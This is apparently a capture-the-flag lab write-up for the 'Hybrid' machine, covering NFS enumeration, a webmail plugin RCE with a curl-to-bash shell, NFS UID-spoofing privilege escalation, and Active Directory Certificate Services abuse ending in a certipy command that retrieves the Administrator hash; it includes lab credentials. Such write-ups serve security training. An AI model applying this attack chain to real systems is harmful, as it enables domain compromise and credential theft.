🧑‍🎓Hybrid

You will learn about Linux joined AD machines and exploiting ADCS.

Enumeration

IPs

10.10.221.54 mail.hybrid.vl
10.10.221.53 dc01.hybrid.vl

We have two machines

.53 is a Domain controller

.54 is a Linux mail server

From the nmap scan we can see that NFS is open, to enumerate mount points we can do showmount -e <ip>

After mounting we see a backup.tar.gz

Now we have two directories

In etc/dovecot we find possible email credentials

In etc/sssd we find a interesting file with references to LDAP and Kerberos, this machine is probably joined to the hybrid.vldomain

SSSD is is used to access remote directory service, like Active directory, and provide SSO capabilities to networks based on Unix

We also find a passwd file with the users in this machine

In /opt/certs/hybrid.vl we find two files one is a SSL certificate, maybe, and the other one looks like a private key

Now with the credentials discovered from the file we can try to log in the webmail

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

The Admin's inbox is empty but we find something in Peter's inbox

The junk filter plugin is probably Markasjunk and should be vulnerable to RCE

We can use this exploit to gain a shell on the machine

Here we download a shell with curl and pipe it to bash

Privilege escalation Linux

This is the other user on the machine

Since we have write access to the share we can create files with Peter's user id

We create a new user in the attacking machine with Peter's user id

We also need to edit /etc/logins.defs and change the maximum UID value

From the attacking machine we copy sh, or bash, to the share and we put the SUID bit on it

Now we are Peter Turner

In the home folder we find a keepass database but it requires a password

Maybe we can try the Peter's email password

And it works!

Now we have Peter's domain password, that we can use on the Linux machine too since it's domain joined

Privilege escalation domain

Now we enumerate the domain using bloodhound-python

Nothing interesting found from this domain dump

But we can enumerate AD certificates with Certipy

My installation of Certipy gives problems so i used the docker version from secure-77

Now to view the output of certipy in bloodhound we need to install a different version

Here we can see a custom certificate template

We can mark MAIL01 as owned and check the shortest path to misconfigured certificate from owned principals

And we can see that MAIL01 is a part of DOMAIN COMPUTERS, and can enroll HYBRIDCOMPUTERS To enroll the certificate we need the MAIL01 machine account hash

Is a keytab file in /etc/krb5.keytab, then we can use this tool to extract the NTLM hash

Now we can request the certificate

If we receive an error regarding the key size we need to specify the correct key size in the command

We can check the correct key size in bloodhound

We have succesfully requested a certificate

Now to pass the certificate we can use this tool

We need to extract the key and the cert from the .pfx file

Then we change the Administrator password

Or directly request the Administrator hash

sudo docker run -it -v $(pwd):/tmp certipy:latest certipy auth -pfx 'administrator.pfx' -username 'Administrator' -domain 'hybrid.vl' -dc-ip 10.10.221.53